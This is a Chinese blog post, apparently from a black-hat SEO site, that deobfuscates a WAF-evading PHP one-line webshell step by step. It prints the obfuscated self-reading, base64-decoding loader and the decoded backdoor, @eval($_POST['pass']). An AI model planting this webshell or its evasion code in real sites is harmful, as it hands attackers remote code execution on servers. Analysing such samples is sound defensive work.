黑帽SEO
免费发布泛目录 蜘蛛池 黑帽SEO工具

一款过waf的一句话木马分析

  中午,下班回来,就看一个朋友给我发了几个马儿 让我看看解解密码 很简单

  一款过waf的一句话木马分析一款过waf的一句话木马分析

  猛不猛我不知道 那时候手机 太长的看着就烦 就回到家瞅瞅了

  首先我们看这个马儿

  一款过waf的一句话木马分析

  一步步来,先分析前面的。前面的PHP代码部分有一个eval,我们改成echo试试

  一款过waf的一句话木马分析

  输出得到

  $OO0OO0000=$OOO000000{17}.$OOO000000{12}.$OOO000000{18}.$OOO000000{5}.$OOO000000{19};if(!0)$O000O0O00=$OO0OO0000($OOO0O0O00,’rb’);$OO0OO000O=$OOO000000{17}.$OOO000000{20}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OO0OO00O0=$OOO000000{14}.$OOO000000{0}.$OOO000000{20}.$OOO000000{0}.$OOO000000{20};$OO0OO000O($O000O0O00,1136);$OO00O00O0=($OOO0000O0($OO0OO00O0($OO0OO000O($O000O0O00,380),’7q84PCgpNaRWIyHw9bZD6xrXYU0EonLetGSOmlFiK5QkuhM3jT/VfBvc+12AsdJz=’,’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/’)));eval($OO00O00O0);

  替换进去得到

  一款过waf的一句话木马分析

  下来我们就要分析了

  

  分析后总结得到

  $OOO0O0O00=__FILE__;//获取当前文件名 $O000O0O00=fopen($OOO0O0O00,’rb’);//打开文件 fread($O000O0O00,248);//跳过248字节 $OO00O00O0=(base64_decode( strtr( fread($O000O0O00,380), ‘7q84PCgpNaRWIyHw9bZD6xrXYU0EonLetGSOmlFiK5QkuhM3jT/VfBvc+12AsdJz=’, ‘ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/’ ) ) );//读取380字节,根据代码表替换字符,base64解码 eval($OO00O00O0);//执行解码后的代码

  一款过waf的一句话木马分析

  解得

一款过waf的一句话木马分析

  @eval($_POST[‘pass’]);//密码就等于pass

未经允许不得转载:黑帽SEO-实战SEO技术培训、泛目录站群、蜘蛛池、流量技术教程 » 一款过waf的一句话木马分析
分享到: 更多 (0)

黑帽SEO-实战SEO技术培训、泛目录站群、蜘蛛池、流量技术教程

不做韭菜坚决不做韭菜